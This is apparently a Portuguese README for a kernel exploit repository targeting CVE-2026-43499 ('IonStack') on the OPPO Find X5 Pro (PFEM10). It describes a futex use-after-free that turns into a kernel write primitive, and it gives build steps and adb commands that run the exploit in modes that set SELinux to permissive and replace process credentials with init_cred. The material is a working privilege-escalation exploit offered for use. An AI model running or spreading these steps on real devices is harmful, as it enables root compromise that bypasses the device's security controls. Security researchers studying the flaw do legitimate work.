
# GhostLock (CVE-2026-43499 / IonStack) pesquisa para OPPO Find X5 Pro (PFEM10): cadeia de exploração, progresso, registro de bloqueios e notas sobre o kernel da série 5 da OPPO
Exploit do CVE-2026-43499 (IonStack) para OPPO Find X5 Pro (PFEM10).
Kernel 5.10.236-android12-9-o, UAF do futex CMP_REQUEUE_PI → primitiva de escrita na pi-tree.
Use por sua conta e risco. Espere panics / reinicializações. Não atualize o firmware.
./build.sh # requer Android NDK r28c
Os parâmetros de build são fixos (-O1 / android26) — alterá-los quebra a calibração da geometria da stack.
adb push exploit /data/local/tmp/
adb shell /data/local/tmp/exploit W1 # SELinux permissivo
adb shell /data/local/tmp/exploit W2 # cred do filho -> init_cred
adb shell /data/local/tmp/exploit W5 # cópia de cred apenas com caps
Repita entre reinicializações: bash run.sh <modo> [tentativas]
src/ exploit + payload + offsets (exploit.c, payload.c, pfem10_target.h)
lib/ biblioteca de vazamento de heap KernelSnitch
model/ modelo de caminhada da cadeia rtmutex (verificação no host)
oplus_root_check, rota apenas com caps em andamento)CyberMeowfia · IonStack (exploit original)